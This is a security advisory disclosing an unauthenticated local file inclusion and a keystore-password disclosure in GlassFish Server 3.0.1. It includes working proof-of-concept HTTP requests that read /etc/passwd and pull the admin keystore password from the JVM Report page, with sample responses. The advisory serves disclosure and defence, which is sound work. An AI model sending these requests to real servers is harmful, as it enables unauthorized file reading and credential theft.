Trustwave SpiderLabs Security Advisory TWSL2016-011: Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1 Published: 06/08/2016 Version: 1.0 Vendor: Oracle Corporation Product: GlassFish Server Open Source Edition Version affected: 3.0.1 (build 22) Product description: GlassFish Server 3.0.1 is built on a modular, flexible runtime based on the OSGi standard. It enables organizations to create and deploy Web applications with the lightweight Java EE 6 Web Profile and to easily leverage the power of the full Java EE 6 platform for enterprise applications. Developers also benefit from the simplified programming model and productivity improvements offered by Java EE 6. The result is a flexible platform that can apply only what is needed to address the business problem, thereby reducing cost and complexity. Because GlassFish Server 3.0.1 uses a microkernel architecture based on OSGi, developers can begin with the Java EE 6 Web Profile and use the Update Center to dynamically upgrade to the full Java EE 6 platform! Finding 1: Local File Inclusion Credit: Piotr Karolak of Trustwave's SpiderLabs A vulnerability in GlassFish Server Open Source Edition 3.0.1 (build 22) makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. The following PoC (Proof of Concept) demonstrates the vulnerability: REQUEST ======= GET /resource/file%3a///etc/passwd/ HTTP/1.1 Host: a.b.c.d:4848 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close RESPONSE ======== HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish Server Open Source Edition 3.0.1 X-Powered-By: JSF/2.0 Last-Modified: Tue, 05 Jan 2016 08:12:11 GMT Expires: Mon, 25 Jan 2016 10:33:19 GMT Content-Type: application/octet-stream Content-Length: 2243 Date: Tue, 05 Jan 2016 15:55:31 GMT Connection: close root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync TRUNCATED glassfish:x:120:65534::/home/glassfish:/bin/bash Finding 2: Java Key Store Password Disclosure Credit: Piotr Karolak of Trustwave's SpiderLabs A vulnerability, which could allow an unauthenticated, remote attacker to obtain administrative privileged access to the web interface of the affected device. An attacker would be able to exploit this vulnerability by submitting TRACE method request. Successful exploitation of this vulnerability could provide an unauthenticated attacker plain text password of administrative user and grant access to the web-based administration interface. In case of an authenticated user, a HTTP GET request to the JVM Report page will disclose Java Key Store password of The Admin Console and help launch further attacks on the affected system. The following PoC (Proof of Concept) demonstrates the vulnerability: REQUEST ======= GET /common/appServer/jvmReport.jsf?pageTitle=JVM%20Report HTTP/1.0 Host: a.b.c.d:4848 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: appServerRegistrationRemindLaterCookie=true; JSESSIONID=355826450d198ee743cefd78558c; treeForm:tree-hi= Connection: close Cache-Control: max-age=0 RESPONSE ======== HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish Server Open Source Edition 3.0.1 Pragma: No-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 16:00:00 PST X-Powered-By: JSF/2.0 Content-Type: text/html;charset=UTF-8 Date: Tue, 05 Jan 2016 20:32:52 GMT Connection: close JVM Report TRUNCATED java.vendor.url.bug = java.version = 1.7.0_79 = mixed mode = OpenJDK 64-Bit Server VM = Java Virtual Machine Specification java.vm.specification.vendor = Oracle Corporation java.vm.specification.version = 1.7 java.vm.vendor = Oracle Corporation java.vm.version = 24.79-b02 = /home/glassfish/glassfish/domains/domain1/config/keystore.jks = MY-ADMIN-PASSSWORD = /home/glassfish/glassfish/domains/domain1/config/cacerts.jks = MY-ADMIN-PASSSWORD javax.rmi.CORBA.PortableRemoteObjectClass = Remediation Steps: No official fix is available. However, administrators can mitigate these findings with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often, Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the presence of Local File Inclusion vulnerabilities and other software weaknesses. Revision History: 01/07/2016 - Vulnerability disclosed to vendor 04/06/2016 - Exceeded 90 days after date of contact to release a patch 06/01/2016 - Vendor acknowledges findings are not addressed and closes ticket 06/08/2016 - Advisory published References 1. 2. About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.